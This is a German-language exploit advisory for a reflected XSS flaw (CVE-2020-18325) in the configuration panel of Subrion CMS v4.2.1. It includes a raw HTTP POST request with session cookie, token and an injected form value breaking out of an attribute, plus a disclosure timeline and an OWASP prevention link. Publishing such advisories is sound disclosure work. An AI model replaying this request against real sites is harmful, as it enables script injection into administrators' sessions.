
Proof-of-Concept-Exploit für reflektierte XSS-Schwachstellen im Konfigurationspanel von Subrion CMS v4.2.1, der JavaScript-Injection über POST-Anfragen demonstriert.
Subrion CMS ist einfach zu installieren und unkompliziert zu verwalten. Verwenden Sie es als eigenständige Anwendung oder in Verbindung mit anderen Anwendungen, um Einsteiger-Seiten, mittelgroße oder große Websites zu erstellen.
Im Konfigurationsbereich von Subrion CMS v4.2.1 wurden mehrere Reflected Cross-Site-Scripting-Sicherheitslücken entdeckt, die es einem entfernten Angreifer ermöglichen, beliebiges JavaScript einzuschleusen.
Datum: 27-02-2022
Software-Link: https://subrion.org
Exploit-Autor: HaMM0nz
CVE: CVE-2020-18325
Kategorie: Webanwendung
Betroffene URLs
POST /panel/configuration/pictures/ HTTP/1.1
Host: 172.16.63.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.63.129/panel/configuration/pictures/
Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623
Content-Length: 5605
Connection: close
Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded
Upgrade-Insecure-Requests: 1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="__st"
t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[image_quality]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[image_quality]"
75
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[allow_animated_gifs]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
0
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
test">1qazx
Entdeckung und Meldung: 24. Juni 2019
CVE-ID wurde vergeben: 11. August 2021
Veröffentlichung: 27. Februar 2022
Ziehen Sie in Betracht, die OWASP-Richtlinien zur XSS-Prävention zu befolgen. (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)